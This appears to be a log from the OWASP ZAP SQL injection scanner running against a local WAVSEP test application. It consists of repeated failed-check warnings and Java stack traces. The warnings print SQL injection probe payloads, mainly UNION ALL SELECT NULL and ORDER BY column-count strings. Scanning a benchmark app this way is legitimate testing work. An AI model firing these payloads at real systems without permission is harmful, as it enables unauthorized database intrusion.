http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682335 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682337 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682338 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682338 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682339 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 9193#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 9193# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682339 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682341 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682341 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682342 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 7597#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 7597# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682343 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682343 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 